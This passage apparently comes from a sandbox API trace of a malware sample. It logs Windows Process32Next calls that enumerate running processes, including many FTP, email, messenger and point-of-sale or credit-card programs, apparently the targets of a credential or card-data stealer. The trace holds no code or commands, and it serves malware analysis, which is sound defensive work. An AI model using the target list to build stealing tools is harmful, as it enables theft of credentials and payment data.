cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0289.412] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.413] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0289.415] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.416] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0289.418] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0289.423] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0289.425] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.427] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.429] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0289.431] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.483] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.533] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.535] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.537] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.539] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.541] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.543] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0289.549] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0289.551] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0289.553] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.556] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0289.558] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0289.563] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0289.565] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0289.567] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.569] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0289.571] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0289.573] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0289.597] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0289.599] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0289.601] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0289.603] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0289.609] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0289.611] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0289.613] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0289.615] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0289.616] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0289.619] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0289.621] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0289.626] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0289.628] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0289.630] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0289.632] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0289.634] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0289.636] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0289.673] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0289.675] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0289.677] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0289.679] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0289.681] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0289.683] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0289.688] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0289.690] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0289.692] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0289.694] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0289.697] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0289.702] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0289.705] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0289.707] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0289.709] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0289.712] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0289.714] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0289.766] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0289.768] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0289.770] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0289.771] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0289.773] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0289.775] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0289.776] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0289.781] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0289.782] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0289.784] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0289.785] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0289.787] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0289.789] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0289.790] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0289.792] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0289.794] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0289.798] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0289.799] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0289.801] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0289.803] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0289.804] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, 